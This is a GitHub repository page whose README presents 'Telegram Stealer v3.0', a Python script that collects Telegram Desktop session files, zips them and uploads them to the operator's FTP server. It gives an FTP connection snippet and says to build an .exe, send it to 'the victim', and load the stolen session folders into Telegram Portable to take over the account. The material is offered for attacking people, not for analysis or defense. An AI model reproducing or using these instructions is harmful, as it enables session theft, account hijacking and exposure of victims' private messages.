Skip to content

AndrewHudzenko/Telegram-Stealer-Python

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

4 Commits
 
 
 
 
 
 

Repository files navigation

Telegram Stealer v3.0

This script is designed to retrieve Telegram Desktop access data by copying relevant files and folders to a backup location and archiving them in a zip file. It also provides the ability to upload this archive to an FTP server for remote storage.

Prerequisites

  • Python 3.x
  • Required Python packages: ftplib

Usage

  1. Clone or download the repository.

  2. Open the Vectr_v3.0.py file in a text editor.

  3. Modify the following variables according to your requirements:

    ftp = FTP()
    ftp.set_debuglevel(2)
    ftp.connect('Host_Name', 21)
    ftp.login('User_Name', 'Password')
    ftp.cwd('/htdocs/tgtest')
  4. Use auto-py-to-exe-master to create an .exe file following the instructions in the picture below:

    Example Image

  5. After creating the .exe file, send it to the victim. After the victim runs it, your FTP server will receive an archive with the data.

    You can use, for example, FileZilla to communicate with your FPT server and interact with files

  6. Download Telegram Portable

    Go to the folder with the downloaded Telegram Portable:

    Example Image

  7. Run Telegram.exe - in the folder tdata it should create files and also the folder D877F783D5D3EF8C, if the folder was not created, try to close Telegram and try again, it is not always created from the first time:

    Should looks like this:

    Example Image

    Close Telegram

  8. Unzip the archive from the FTP server and go through the folder hierarchy until you get to our two main folders connection_hash and map:

    Example Image

  9. Now, the most important thing, copy all files from the connection_hash folder (from the archive) to the tdata folder (Telegram Portable directory), replacing the required files:

    Example Image

  10. Next, copy all available folders from the map folder (from the archive) into the tdata folder (Telegram Portable directory), replacing them with the required folders:

    Example Image

  11. That's all, run Telegram.exe and have fun!

About

No description, website, or topics provided.

Resources

Stars

Watchers

Forks

Releases

No releases published

Packages

 
 
 

Contributors

Languages